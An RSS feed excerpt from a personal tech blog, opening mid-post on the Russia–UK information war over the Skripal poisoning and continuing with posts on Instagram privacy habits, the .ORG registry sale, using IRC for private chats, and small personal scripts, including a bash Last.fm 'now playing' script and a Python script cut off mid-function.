<p>Here are a few interesting things to note:</p>

<ol>
<li>The entire process starting with the OPCW and the labs is top-secret.
How did Russia even know Speiz was one of the labs?</li>
<li>On April 11th, the OPCW mentioned BZ in a report confirming Porton
Down&#8217;s findings. Note that Russia is a part of OPCW, and are fully
aware of the quality control measures in place. Surely they knew
about the reason for BZ&#8217;s use?</li>
</ol>

<p>Regardless, the Russian version of the story spread fast. They cashed in
on two major factors to plant this disinfo:</p>

<ol>
<li>&#8220;NATO bad&#8221; : Overused, but surprisingly works. People love a story
that goes full 180°.</li>
<li>Spiez can&#8217;t defend itself: At the risk of revealing that it was one
of the facilities testing the toxin, Spiez was only able to &#8220;not
comment&#8221;.</li>
</ol>

<h3 id="april-3-2018">April 3, 2018</h3>

<ul>
<li>The Independent publishes a story based on an interview with the chief
executive of Porton Down, Gary Aitkenhead.</li>
<li>Aitkenhead says they&#8217;ve identified Novichok but &#8220;have not identified
the precise source&#8221;.</li>
<li>Days earlier, Boris Johnson (then-Foreign Secretary) claimed that
Porton Down confirmed the origin of the toxin to be Russia.</li>
<li>This discrepancy was immediately promoted by Moscow, and its network
all over.</li>
</ul>

<p>This one is especially interesting because of how <em>simple</em> it is to
exploit a small contradiction, that could&#8217;ve been an honest mistake.
This episode is also interesting because the British actually attempted
damage control this time. Porton Down tried to clarify Aitkenhead&#8217;s
statement via a tweet<sup class="footnote-ref" id="fnref-dstltweet"><a href="#fn-dstltweet">2</a></sup>:</p>

<blockquote>
  <p>Our experts have precisely identified the nerve agent as a Novichok. 
  It is not, and has never been, our responsibility to confirm the source 
  of the agent @skynews @UKmoments</p>
</blockquote>

<p>Quoting the <a href="https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/">Defense One</a> 
article on the matter:</p>

<blockquote>
  <p>The episode is seen by those inside Britain’s security communications team 
  as the most serious misstep of the crisis, which for a period caused real 
  concern. U.K. officials told me that, in hindsight, Aikenhead could never 
  have blamed Russia directly, because that was not his job—all he was 
  qualified to do was identify the chemical. Johnson, in going too far, 
  was more damaging. Two years on, he is now prime minister.</p>
</blockquote>

<h3 id="may-2018">May 2018</h3>

<ul>
<li>OPCW facilities receive an email from Spiez inviting them to
a conference.</li>
<li>The conference itself is real, and has been organized before.</li>
<li>The email however, was not---attached was a Word document containing
malware.</li>
<li>Also seen were inconsistencies in the email formatting, from what was
normal.</li>
</ul>

<p>This spearphishing campaign was never offically attributed to Moscow,
but there are a lot of tells here that point to it being the work of
a state actor:</p>

<ol>
<li>Attack targetting a specific group of individuals.</li>
<li>Relatively high level of sophistication---email formatting,
malicious Word doc, etc.</li>
</ol>

<p>However, the British NCSC have deemed with &#8220;high confidence&#8221; that the
attack was perpetrated by GRU. In the UK intelligence parlance, &#8220;highly
likely&#8221; / &#8220;high confidence&#8221; usually means &#8220;definitely&#8221;.</p>

<h2 id="britains-defense">Britain&#8217;s defense</h2>

<h3 id="september-5-2018">September 5, 2018</h3>

<p>The UK took a lot of hits in 2018, but they eventually came back:</p>

<ul>
<li>Metropolitan Police has a meeting with the press, releasing their
findings.</li>
<li>CCTV footage showing the two Russian hitmen was released.</li>
<li>Traces of Novichok identified in their hotel room.</li>
</ul>

<p>This sudden news explosion from Britan&#8217;s side completely
bulldozed the information space pertaining to the entire event.
According to Defense One:</p>

<blockquote>
  <p>Only two of the 10 most viral stories in the weeks following the announcement 
  were sympathetic to Russia, according to NewsWhip. Finally, officials recalled, 
  it felt as though the U.K. was the aggressor. “This was all kept secret to 
  put the Russians on the hop,” one told me. “Their response was all over the 
  place from this point. It was the turning point.”</p>
</blockquote>

<p>Earlier in April, 4 GRU agents were arrested in the Netherlands, who
were there to execute a cyber operation against the OPCW (located in The
Hague), via their WiFi networks. They were arrested by Dutch security,
and later identifed as belonging to Unit 26165. They also seized a bunch
of equipment from the room and their car.</p>

<blockquote>
  <p>The abandoned equipment revealed that the GRU unit involved had sent
  officers around the world to conduct similar cyberattacks. They had
  been in Malaysia trying to steal information about the investigation
  into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne,
  Switzerland, where a World Anti-Doping Agency (WADA) conference was taking
  place as Russia faced sanctions from the International Olympic Committee.
  Britain has said that the same GRU unit attempted to compromise Foreign
  Office and Porton Down computer systems after the Skripal poisoning.</p>
</blockquote>

<h3 id="october-4-2018">October 4, 2018</h3>

<p>UK made the arrests public, published a list of infractions commited by
Russia, along with the specific GRU unit that was caught.</p>

<p>During this period, just one of the top 25 viral stories was from
a pro-Russian outlet, RT---that too a fairly straightforward piece.</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>As with conventional warfare, it&#8217;s hard to determine who won. Britain
may have had the last blow, but Moscow---yet again---depicted their
finesse in information warfare. Their ability to seize unexpected
openings, gather intel to facilitate their disinformation campaigns, and
their cyber capabilities makes them a formidable threat. </p>

<p>2020 will be fun, to say the least.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-skripal">
<p><a href="https://en.wikipedia.org/wiki/Sergei_Skripal">https://en.wikipedia.org/wiki/Sergei_Skripal</a>&#160;<a href="#fnref-skripal" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-dstltweet">
<p><a href="https://twitter.com/dstlmod/status/981220158680260613">https://twitter.com/dstlmod/status/981220158680260613</a>&#160;<a href="#fnref-dstltweet" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/ru-vs-gb</link><pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ru-vs-gb</guid></item><item><title>Instagram OPSEC</title><description><![CDATA[<p>Which I am not, of course. But seeing as most of my peers are, I am
compelled to write this post. Using a social platform like Instagram
automatically implies that the user understands (to some level) that
their personally identifiable information is exposed publicly, and they
sign up for the service understanding this risk---or I think they do,
anyway. But that&#8217;s about it, they go ham after that. Sharing every nitty
gritty detail of their private lives without understanding the potential
risks of doing so.</p>

<p>The fundamentals of OPSEC dictacte that you develop a threat model, and
Instgrammers are <em>obviously</em> incapable of doing that---so I&#8217;ll do it
for them. </p>

<h2 id="your-average-instagrammers-threat-model">Your average Instagrammer&#8217;s threat model</h2>

<p>I stress on the word &#8220;average&#8221;, as in this doesn&#8217;t apply to those with
more than a couple thousand followers. Those type of accounts inherently
face different kinds of threats---those that come with having
a celebrity status, and are not in scope of this analysis.</p>

<ul>
<li><p><strong>State actors</strong>: This doesn&#8217;t <em>really</em> fit into our threat model,
since our target demographic is simply not important enough. That said,
there are select groups of individuals that operate on
Instagram<sup class="footnote-ref" id="fnref-ddepisode"><a href="#fn-ddepisode">1</a></sup>, and they can potentially be targetted by a state
actor.</p></li>
<li><p><strong>OSINT</strong>: This is probably the biggest threat vector, simply because
of the amount of visual information shared on the platform. A lot can be
gleaned from one simple picture in a nondescript alleyway. We&#8217;ll get
into this in the DOs and DON&#8217;Ts in a bit.</p></li>
<li><p><strong>Facebook &amp; LE</strong>: Instagram is the last place you want to be doing an
illegal, because well, it&#8217;s logged and more importantly---not
end-to-end encrypted. Law enforcement can subpoena any and all account
information. Quoting Instagram&#8217;s 
<a href="https://help.instagram.com/494561080557017">page on this</a>:</p></li>
</ul>

<blockquote>
  <p>a search warrant issued under the procedures described in the Federal 
  Rules of Criminal Procedure or equivalent state warrant procedures 
  upon a showing of probable cause is required to compel the disclosure 
  of the stored contents of any account, which may include messages, 
  photos, comments, and location information.</p>
</blockquote>

<p>That out of the way, here&#8217;s a list of DOs and DON&#8217;Ts to keep in mind
while posting on Instagram.</p>

<h3 id="donts">DON&#8217;Ts</h3>

<ul>
<li><p>Use Instagram for planning and orchestrating illegal shit! I&#8217;ve
explained why this is a terrible idea above. Use secure comms---even
WhatsApp is a better choice, if you have nothing else. In fact, try
avoiding IG DMs altogether, use alternatives that implement E2EE.</p></li>
<li><p>Film live videos outside. Or try not to, if you can. You might
unknowingly include information about your location: street signs,
shops etc. These can be used to ascertain your current location.</p></li>
<li><p>Film live videos in places you visit often. This compromises your
security at places you&#8217;re bound to be at.</p></li>
<li><p>Share your flight ticket in your story! I can&#8217;t stress this enough!!!
Summer/winter break? &#8220;Look guys, I&#8217;m going home! Here&#8217;s where I live,
and here&#8217;s my flight number---feel free to track me!&#8221;. This scenario is
especially worrisome because the start and end points are known to the
threat actor, and your arrival time can be trivially looked up---thanks
to the flight number on your ticket. So, just don&#8217;t.</p></li>
<li><p>Post screenshots with OS specific details. This might border on
pendantic, but better safe than sorry. Your phone&#8217;s statusbar and navbar 
are better cropped out of pictures. They reveal the time, notifications
(apps that you use), and can be used to identify your phone&#8217;s operating
system.  Besides, the status/nav bar isn&#8217;t very useful to your screenshot 
anyway.</p></li>
<li><p>Share your voice. In general, reduce your footprint on the platform
that can be used to identify you elsewhere.</p></li>
<li><p>Think you&#8217;re safe if your account is set to private. It doesn&#8217;t take
much to get someone who follows you, to show show your profile on their
device.</p></li>
</ul>

<h3 id="dos">DOs</h3>

<ul>
<li><p>Post pictures that pertain to a specific location, once you&#8217;ve moved
out of the location. Also applies to stories. It can wait.</p></li>
<li><p>Post pictures that have been shot indoors. Or try to; reasons above.
Who woulda thunk I&#8217;d advocate bathroom selfies?</p></li>
<li><p>Delete old posts that are irrelevant to your current audience. Your
friends at work don&#8217;t need to know about where you went to high school.</p></li>
</ul>

<p>More DON&#8217;Ts than DOs, that&#8217;s very telling. Here are a few more points
that are good OPSEC practices in general:</p>

<ul>
<li><strong>Think before you share</strong>. Does it conform to the rules mentioned above?</li>
<li><strong>Compartmentalize</strong>. Separate as much as you can from what you share
online, from what you do IRL. Limit information exposure.</li>
<li><strong>Assess your risks</strong>: Do this often. People change, your environments
change, and consequentially the risks do too.</li>
</ul>

<h2 id="fin">Fin</h2>

<p>Instagram is---much to my dismay---far too popular for it to die any
time soon. There are plenty of good reasons to stop using the platform
altogether (hint: Facebook), but that&#8217;s a discussion for another day.</p>

<p>Or be like me:</p>

<p><img src="/static/img/ig.jpg" alt="0 posts lul" /></p>

<p>And that pretty much wraps it up, with a neat little bow.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-ddepisode">
<p><a href="https://darknetdiaries.com/episode/51/---Jack">https://darknetdiaries.com/episode/51/---Jack</a> talks about Indian hackers who operate on Instagram.&#160;<a href="#fnref-ddepisode" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/ig-opsec</link><pubDate>Mon, 02 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ig-opsec</guid></item><item><title>Save .ORG!</title><description><![CDATA[<p>The .ORG top-level domain introduced in 1985, has been operated by the
<a href="https://en.wikipedia.org/wiki/Public_Interest_Registry">Public Interest Registry</a> since
2003. The .ORG TLD is used primarily by communities, free and open source projects, 
and other non-profit organizations---although the use of the TLD isn&#8217;t
restricted to non-profits.</p>

<p>The Internet Society or ISOC, the group that created the PIR, has
decided to sell the registry over to a private equity firm---Ethos
Capital.</p>

<h2 id="whats-the-problem">What&#8217;s the problem?</h2>

<p>There are around 10 million .ORG TLDs registered, and a good portion of
them are non-profits and non-governmental organizations. As the name
suggests, they don&#8217;t earn any profits and all their operations rely on
a thin inflow of donations. A private firm having control of the .ORG
domain gives them the power to make decisions that would be unfavourable
to the .ORG community:</p>

<ul>
<li><p>They control the registration/renewal fees of the TLD. They can
hike the price if they wish to. As is stands, NGOs already earn very
little---a .ORG price hike would put them in a very icky situation.</p></li>
<li><p>They can introduce <a href="https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en">Rights Protection
Mechanisms</a>
or RPMs, which are essentially legal statements that can---if not
correctly developed---jeopardize / censor completely legal non-profit
activities.</p></li>
<li><p>Lastly, they can suspend domains at the whim of state actors. It isn&#8217;t
news that nation states go after NGOs, targetting them with allegations
of illegal activity. The registry being a private firm only simplifies
the process.</p></li>
</ul>

<p>Sure, these are just &#8220;what ifs&#8221; and speculations, but the risk is real.
Such power can be abused and this would be severly detrimental to NGOs
globally.</p>

<h2 id="how-can-i-help">How can I help?</h2>

<p>We need to get the ISOC to <strong>stop the sale</strong>. Head over to
<a href="https://savedotorg.org">https://savedotorg.org</a> and sign their letter. An email is sent on your
behalf to:</p>

<ul>
<li>Andrew Sullivan, CEO, ISOC</li>
<li>Jon Nevett, CEO, PIR</li>
<li>Maarten Botterman, Board Chair, ICANN</li>
<li>Göran Marby, CEO, ICANN</li>
</ul>

<h2 id="closing-thoughts">Closing thoughts</h2>

<p>The Internet that we all love and care for is slowly being subsumed by
megacorps and private firms, who&#8217;s only motive is to make a profit. The
Internet was meant to be free, and we&#8217;d better act now if we want that
freedom. The future looks bleak---I hope we aren&#8217;t too late.</p>
]]></description><link>https://icyphox.sh/blog/save-org</link><pubDate>Sat, 23 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/save-org</guid></item><item><title>Status update</title><description><![CDATA[<p>This month is mostly just unfun stuff, lined up in a neat schedule --
exams. I get all these cool ideas for things to do, and it&#8217;s always
during exams. Anyway, here&#8217;s a quick update on what I&#8217;ve been up to.</p>

<h2 id="blog-post-queue">Blog post queue</h2>

<p>I realized that I could use this site&#8217;s
<a href="https://github.com/icyphox/site">repo</a>&#8217;s issues to track blog post ideas.
I&#8217;ve made a few, mostly just porting them over from my Google Keep note.</p>

<p>This method of using issues is great, because readers can chime in with
ideas for things I could possibly discuss---like in <a href="https://github.com/icyphox/site/issues/10">this
issue</a>.</p>

<h2 id="contemplating-a-vite-rewrite">Contemplating a <code>vite</code> rewrite</h2>

<p><a href="https://github.com/icyphox/vite"><code>vite</code></a>, despite what the name suggests
-- is awfully slow. Also, Python is bloat.
Will rewriting it fix that? That&#8217;s what I plan to find out. I have
a couple of choices of languages to use in the rewrite:</p>

<ul>
<li>C: Fast, compiled. Except I suck at it. (<code>cite</code>?)</li>
<li>Nim: My favourite, but I&#8217;ll have to write bindings to <a href="https://github.com/kristapsdz/lowdown"><code>lowdown(1)</code></a>. (<code>nite</code>?)</li>
<li>Shell: Another favourite, muh &#8220;minimalsm&#8221;. No downside, really.
(<code>shite</code>?)</li>
</ul>

<p>Oh, and did I mention---I want it to be compatible with <code>vite</code>.
I don&#8217;t want to have to redo my site structure or its templates. At the
moment, I rely on Jinja2 for templating, so I&#8217;ll need something similar.</p>

<h2 id="irc-bot">IRC bot</h2>

<p>My earlier post on <a href="/blog/irc-for-dms">IRC for DMs</a> got quite a bit of
traction, which was pretty cool. I didn&#8217;t really talk much about the bot
itself though; I&#8217;m dedicating this section to
<a href="https://github.com/icyphox/detotated">detotated</a>.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>

<p>Fairly simple Python code, using plain sockets. So far, we&#8217;ve got a few
basic features in place:</p>

<ul>
<li><code>.np</code> command: queries the user&#8217;s last.fm to get the currently playing
track</li>
<li>Fetches the URL title, when a URL is sent in chat</li>
</ul>

<p>That&#8217;s it, really. I plan to add a <code>.nps</code>, or &#8220;now playing Spotify&#8221;
command, since we share Spotify links pretty often.</p>

<h2 id="other">Other</h2>

<p>I&#8217;ve been reading some more manga, I&#8217;ll update the <a href="/reading">reading
log</a> when I, well&#8230; get around to it. Haven&#8217;t had time to do
much in the past few weeks---the time at the end of a semester tends to
get pretty tight. Here&#8217;s what I plan to get back to during this winter break:</p>

<ul>
<li>Russian!</li>
<li>Window manager in Nim</li>
<li><code>vite</code> rewrite, probably</li>
<li>The other blog posts in queue</li>
</ul>

<p>I&#8217;ve also put off doing any &#8220;security work&#8221; for a while now, perhaps
that&#8217;ll change this December. Or whenever.</p>

<p>With that ends my status update, on all things that I <em>haven&#8217;t</em> done.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p><a href="https://knowyourmeme.com/memes/dedotated-wam">https://knowyourmeme.com/memes/dedotated-wam</a> (dead meme, yes I know)&#160;<a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/2019-11-16</link><pubDate>Sat, 16 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-11-16</guid></item><item><title>IRC for DMs</title><description><![CDATA[<p><a href="https://nerdypepper.me">Nerdy</a> and I decided to try and use IRC for our
daily communications, as opposed to non-free alternatives like WhatsApp
or Telegram. This is an account of how that went.</p>

<h2 id="the-status-quo-of-instant-messaging-apps">The status quo of instant messaging apps</h2>

<p>I&#8217;ve tried a <em>ton</em> of messaging applications---Signal, WhatsApp,
Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.</p>

<p><strong>Signal</strong>: It straight up sucks on Android. Not to mention the
centralized architecture, and OWS&#8217;s refusal to federate.</p>

<p><strong>WhatsApp</strong>: Facebook&#8217;s spyware that people use without a second
thought. The sole reason I have it installed is for University&#8217;s
class groups; I can&#8217;t wait to graduate.</p>

<p><strong>Telegram</strong>: Centralized architecture and a closed-source server. It&#8217;s
got a very nice Android client, though.</p>

<p><strong>Jami</strong>: Distributed platform, free software. I am not going to comment
on this because I don&#8217;t recall what my experience was like, but I&#8217;m not
using it now&#8230; so if that&#8217;s indicative of anything.</p>

<p><strong>Matrix (Riot)</strong>: Distributed network. Multiple client implementations.
Overall, pretty great, but it&#8217;s slow. I&#8217;ve had messages not send / not
received a lot of times. Matrix + Riot excels in group communication, but
really sucks for one-to-one chats.</p>

<p><strong>Slack</strong> / <strong>Discord</strong>: <em>sigh</em></p>

<p><strong>DeltaChat</strong>: Pretty interesting idea---on paper. Using existing email
infrastructure for IM sounds great, but it isn&#8217;t all that cash in
practice. Email isn&#8217;t instant, there&#8217;s always a delay of give or take
5 to 10 seconds, if not more. This affects the flow of conversation.
I might write a small blog post later, revewing DeltaChat.<sup class="footnote-ref" id="fnref-deltachat"><a href="#fn-deltachat">2</a></sup></p>

<h2 id="why-irc">Why IRC?</h2>

<p>It&#8217;s free, in all senses of the word. A lot of others have done a great
job of answering this question in further detail, this is by far my
favourite:</p>

<p><a href="https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html">https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html</a></p>

<h2 id="using-ircs-private-messages">Using IRC&#8217;s private messages</h2>

<p>This was the next obvious choice, but personal message buffers don&#8217;t
persist in ZNC and it&#8217;s very annoying to have to do a <code>/query
nerdypepper</code> (Weechat) or to search and message a user via Revolution
IRC. The only unexplored option---using a channel.</p>

<h2 id="setting-up-a-channel-for-dms">Setting up a channel for DMs</h2>

<p>A fairly easy process:</p>

<ul>
<li><p>Set modes (on Rizon)<sup class="footnote-ref" id="fnref-modes"><a href="#fn-modes">1</a></sup>:</p>

<pre><code>#crimson [+ilnpstz 3]
</code></pre>

<p>In essence, this limits the users to 3 (one bot), sets the channel to invite only,
hides the channel from <code>/whois</code> and <code>/list</code>, and a few other misc.
modes.</p></li>
<li><p>Notifications: Also a trivial task; a quick modification to <a href="https://weechat.org/scripts/source/lnotify.py.html/">lnotify.py</a>
to send a notification for all messages in the specified buffer
(<code>#crimson</code>) did the trick for Weechat. Revolution IRC, on the other
hand, has an option to setup rules for notifications---super
convenient.</p></li>
<li><p>A bot: Lastly, a bot for a few small tasks---fetching URL titles, responding
to <code>.np</code> (now playing) etc. Writing an IRC bot is dead simple, and it
took me about an hour or two to get most of the basic functionality in
place. The source is <a href="https://github.com/icyphox/detotated">here</a>.
It is by no means &#8220;good code&#8221;; it breaks spectacularly from time to
time.</p></li>
</ul>

<h2 id="in-conclusion">In conclusion</h2>

<p>As the subtitle suggests, using IRC has been great. It&#8217;s probably not
for everyone though, but it fits my (and Nerdy&#8217;s) usecase perfectly.</p>

<p>P.S.: <em>I&#8217;m not sure why the footnotes are reversed.</em></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-modes">
<p>Channel modes on <a href="https://wiki.rizon.net/index.php?title=Channel_Modes">Rizon</a>.&#160;<a href="#fnref-modes" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-deltachat">
<p>It&#8217;s in <a href="https://github.com/icyphox/site/issues/10">queue</a>.&#160;<a href="#fnref-deltachat" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/irc-for-dms</link><pubDate>Sun, 03 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/irc-for-dms</guid></item><item><title>The intelligence conundrum</title><description><![CDATA[<p>I watched the latest <a href="https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series)">S.W.A.T.</a>
episode a couple of days ago, and it highlighted some interesting issues that
intelligence organizations face when working with law enforcement. Side note: it&#8217;s a pretty
good show if you like police procedurals.</p>

<h2 id="the-problem">The problem</h2>

<p>Consider the following scenario:</p>

<ul>
<li>There&#8217;s a local drug lord who&#8217;s been recruited to provide intel, by a certain 3-letter organization.</li>
<li>Local PD busts his operation and proceed to arrest him.</li>
<li>3-letter org steps in, wants him released.</li>
</ul>

<p>So here&#8217;s the thing, his presence is a threat to public but at the same time, 
he can be a valuable long term asset---giving info on drug inflow, exchanges and perhaps even 
actionable intel on bigger fish who exist on top of the ladder. But he also
seeks security. The 3-letter org must provide him with protection, 
in case he&#8217;s blown. And like in our case, they&#8217;d have to step in if he gets arrested.</p>

<p>Herein lies the problem. How far should an intelligence organization go to protect an asset? 
Who matters more, the people they&#8217;ve sworn to protect, or the asset? 
Because afterall, in the bigger picture, local PD and intel orgs are on the same side.</p>

<p>Thus, the question arises---how can we measure the &#8220;usefulness&#8221; of an
asset to better quantify the tradeoff that is to be made? 
Is the intel gained worth the loss of public safety?
This question remains largely unanswered, and is quite the 
predicament should you find yourself in it.</p>

<p>This was a fairly short post, but an interesting problem to ponder
nonetheless.</p>
]]></description><link>https://icyphox.sh/blog/intel-conundrum</link><pubDate>Mon, 28 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/intel-conundrum</guid></item><item><title>Hacky scripts</title><description><![CDATA[<p>As a CS student, I see a lot of people around me doing courses online
to learn to code. Don&#8217;t get me wrong---it probably works for some.
Everyone learns differently. But that&#8217;s only going to get you so far.
Great you know the syntax, you can solve some competitive programming
problems, but that&#8217;s not quite enough, is it? The actual learning comes
from <em>applying</em> it in solving <em>actual</em> problems---not made up ones.
(<em>inb4 some seething CP bro comes at me</em>)</p>

<p>Now, what&#8217;s an actual problem? Some might define it as real world
problems that people out there face, and solving it probably requires
building a product. This is what you see in hackathons, generally.</p>

<p>If you ask me, however, I like to define it as problems that <em>you</em> yourself
face. This could be anything. Heck, it might not even be a &#8220;problem&#8221;. It
could just be an itch that you want to scratch. And this is where
<strong>hacky scripts</strong> come in. Unclear? Let me illustrate with a few
examples.</p>

<h2 id="now-playing-status-in-my-bar">Now playing status in my bar</h2>

<p>If you weren&#8217;t aware already---I rice my desktop. A lot. And a part of
this cohesive experience I try to create involves a status bar up at the
top of my screen, showing the time, date, volume and battery statuses etc.</p>

<p>So here&#8217;s the &#8220;problem&#8221;. I wanted to have my currently playing song
(Spotify), show up on my bar. How did I approach this? A few ideas
popped up in my head:</p>

<ul>
<li>Send <code>playerctl</code>&#8217;s STDOUT into my bar</li>
<li>Write a Python script to query Spotify&#8217;s API</li>
<li>Write a Python/shell script to query Last.fm&#8217;s API</li>
</ul>

<p>The first approach bombed instantly. <code>playerctl</code> didn&#8217;t recognize my
Spotify client and whined about some <code>dbus</code> issues to top it off.
I spent a while in that rabbit hole but eventually gave up.</p>

<p>My next avenue was the Spotify Web API. One look at the <a href="https://developer.spotify.com/documentation/web-api/">docs</a> and
I realize that I&#8217;ll have to make <em>more</em> than one request to fetch the
artist and track details. Nope, I need this to work fast.</p>

<p>Last resort---Last.fm&#8217;s API. Spolier alert, this worked. Also, arguably
the best choice, since it shows the track status regardless of where
the music is being played. Here&#8217;s the script in its entirety:</p>

<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
<span class="c1"># now playing</span>
<span class="c1"># requires the last.fm API key</span>

<span class="nb">source</span> ~/.lastfm    <span class="c1"># `export API_KEY=&quot;&lt;key&gt;&quot;`</span>
<span class="nv">fg</span><span class="o">=</span><span class="s2">&quot;</span><span class="k">$(</span>xres color15<span class="k">)</span><span class="s2">&quot;</span>
<span class="nv">light</span><span class="o">=</span><span class="s2">&quot;</span><span class="k">$(</span>xres color8<span class="k">)</span><span class="s2">&quot;</span>

<span class="nv">USER</span><span class="o">=</span><span class="s2">&quot;icyphox&quot;</span>
<span class="nv">URL</span><span class="o">=</span><span class="s2">&quot;http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks&quot;</span>
<span class="nv">URL</span><span class="o">+=</span><span class="s2">&quot;&amp;user=</span><span class="nv">$USER</span><span class="s2">&amp;api_key=</span><span class="nv">$API_KEY</span><span class="s2">&amp;format=json&amp;limit=1&amp;nowplaying=true&quot;</span>
<span class="nv">NOTPLAYING</span><span class="o">=</span><span class="s2">&quot; &quot;</span>    <span class="c1"># I like to have it show nothing</span>
<span class="nv">RES</span><span class="o">=</span><span class="k">$(</span>curl -s <span class="nv">$URL</span><span class="k">)</span>
<span class="nv">NOWPLAYING</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">&#39;.recenttracks.track[0].&quot;@attr&quot;.nowplaying&#39;</span> <span class="o">&lt;&lt;&lt;</span> <span class="s2">&quot;</span><span class="nv">$RES</span><span class="s2">&quot;</span> <span class="p">|</span> tr -d <span class="s1">&#39;&quot;&#39;</span><span class="k">)</span>


<span class="k">if</span> <span class="o">[[</span> <span class="s2">&quot;</span><span class="nv">$NOWPLAYING</span><span class="s2">&quot;</span> <span class="o">=</span> <span class="s2">&quot;true&quot;</span> <span class="o">]]</span>
<span class="k">then</span>
    <span class="nv">TRACK</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">&#39;.recenttracks.track[0].name&#39;</span> <span class="o">&lt;&lt;&lt;</span> <span class="s2">&quot;</span><span class="nv">$RES</span><span class="s2">&quot;</span> <span class="p">|</span> tr -d <span class="s1">&#39;&quot;&#39;</span><span class="k">)</span>
    <span class="nv">ARTIST</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">&#39;.recenttracks.track[0].artist.&quot;#text&quot;&#39;</span> <span class="o">&lt;&lt;&lt;</span> <span class="s2">&quot;</span><span class="nv">$RES</span><span class="s2">&quot;</span> <span class="p">|</span> tr -d <span class="s1">&#39;&quot;&#39;</span><span class="k">)</span>
    <span class="nb">echo</span> -ne <span class="s2">&quot;%{F</span><span class="nv">$light</span><span class="s2">}</span><span class="nv">$TRACK</span><span class="s2"> %{F</span><span class="nv">$fg</span><span class="s2">}by </span><span class="nv">$ARTIST</span><span class="s2">&quot;</span>
<span class="k">else</span>
    <span class="nb">echo</span> -ne <span class="s2">&quot;</span><span class="nv">$NOTPLAYING</span><span class="s2">&quot;</span>
<span class="k">fi</span>
</code></pre></div>

<p>The <code>source</code> command is used to fetch the API key which I store at
<code>~/.lastfm</code>. The <code>fg</code> and <code>light</code> variables can be ignored, they&#8217;re only
for coloring output on my bar. The rest is fairly trivial and just
involves JSON parsing with <a href="https://stedolan.github.io/jq/"><code>jq</code></a>.
That&#8217;s it! It&#8217;s so small, but I learnt a ton. For those curious, here&#8217;s
what it looks like running:</p>

<p><img src="/static/img/now_playing.png" alt="now playing status polybar" /></p>

<h2 id="update-latest-post-on-the-index-page">Update latest post on the index page</h2>

<p>This pertains to this very blog that you&#8217;re reading. I wanted a quick
way to update the &#8220;latest post&#8221; section in the home page and the
<a href="/blog">blog</a> listing, with a link to the latest post. This would require
editing the Markdown <a href="https://github.com/icyphox/site/tree/master/pages">source</a>
of both pages.</p>

<p>This was a very
interesting challenge to me, primarily because it requires in-place
editing of the file, not just appending. Sure, I could&#8217;ve come up with
some <code>sed</code> one-liner, but that didn&#8217;t seem very fun. Also I hate
regexes. Did a lot of research (read: Googling) on in-place editing of
files in Python, sorting lists of files by modification time etc. and
this is what I ended up on, ultimately:</p>

<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>

<span class="kn">from</span> <span class="nn">markdown2</span> <span class="kn">import</span> <span class="n">markdown_path</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">fileinput</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># change our cwd</span>
<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s2">&quot;bin&quot;</span><span class="p">)</span>

<span class="n">blog</span> <span class="o">=</span> <span class="s2">&quot;../pages/blog/&quot;</span>

<span class="c1"># get the most recently created file</span>
<span class="k">def</span> <span class="nf">getrecent</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
    <span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="n">path</span> <span class="o">+</span> <span class="n">f</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">blog</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="s2">&quot;_index.md&quot;</span><span class="p">,</span> <span class="s2">&quot;feed.xml&quot;</span><span class="p">]]</span>
    <span class="n">files</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">,</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
